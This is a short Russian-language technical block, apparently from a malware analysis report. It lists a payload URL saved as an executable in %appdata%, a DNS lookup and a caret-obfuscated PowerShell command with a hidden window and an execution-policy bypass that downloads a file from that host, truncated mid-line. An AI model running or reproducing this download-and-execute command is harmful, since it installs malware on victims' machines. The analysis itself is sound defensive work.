Техническая информация
- http://www.u19983.onhh.ru/junior_crypted.rar как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwE^RsheLL.E^Xe^ -^ex^ecU^tIOnpol^iC^Y ^bY^PaS^s ^-nOp^rOf^iL^e^ -w^I^n^DO^wST^y^Le ^hi^Dd^E^N ^(^nEw-oBjecT SYSTEm^.^N^ET.we^bcli^eNt).^DO^wN^LO^ad^fIL^e^(^'http://www.u19983.onhh...
- DNS ASK u1###3.onhh.ru
- '<SYSTEM32>\cmd.exe' /c "pOwE^RsheLL.E^Xe^ -^ex^ecU^tIOnpol^iC^Y ^bY^PaS^s ^-nOp^rOf^iL^e^ -w^I^n^DO^wST^y^Le ^hi^Dd^E^N ^(^nEw-oBjecT SYSTEm^.^N^ET.we^bcli^eNt).^DO^wN^LO^ad^fIL^e^(^'http://www.u19983.onhh...' (со скрытым окном)